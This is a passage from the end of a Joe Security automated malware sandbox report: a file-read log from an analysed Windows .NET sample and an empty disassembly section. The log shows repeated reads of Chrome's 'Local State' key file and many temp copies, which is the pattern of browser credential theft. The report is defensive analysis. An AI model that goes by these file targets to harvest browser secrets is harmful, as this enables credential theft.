C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\1348a5d04b41c614e48fe5fdb88d1cfa\System.ServiceModel.Internals.ni.dll.aux
unknown 592 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux
unknown 864 success or wait 1 6D42DE2C ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5faf546a8e018d89b1c277e0be243e4b\System.Net.Http.ni.dll.aux
unknown 536 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\97cbf6eb6477005cffa6992126db856c\System.Web.Extensions.ni.dll.aux
unknown 3712 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web\9e5950923286f171d1649a05bdc62830\System.Web.ni.dll.aux
unknown 3972 success or wait 1 6D42DE2C ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 24 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp62EE.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp64E3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile
File Read
Copyright Joe Security LLC 2022 Page 64 of 65
C:\Users\user\AppData\Local\Temp\tmp67A3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp6C85.tmp unknown 28672 success or wait 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Security\754ca70e68140abcdb8476cff64c4169\System.Security.ni.dll.aux
unknown 912 success or wait 1 6D42DE2C ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp71C5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp738B.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7551.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7718.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp790D.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp unknown 524288 success or wait 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\98d3949f9ba1a384939805aa5e47e933\System.Management.ni.dll.aux
unknown 764 success or wait 1 6D42DE2C ReadFile
C:\Users\user\AppData\Local\Temp\tmp533A.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp3E26.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux
unknown 1720 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux
unknown 584 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\849e4f93d41f8b6645878090ee9a7505\Microsoft.CSharp.ni.dll.aux
unknown 700 success or wait 1 6D42DE2C ReadFile
C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\81f3dddd8aa6172d72bf5f1161e6fd01\System.Dynamic.ni.dll.aux
unknown 536 success or wait 1 6D42DE2C ReadFile
File Path Offset Length Completion Count Source Address Symbol
⊘ No disassembly
Disassembly
Copyright Joe Security LLC 2022 Page 65 of 65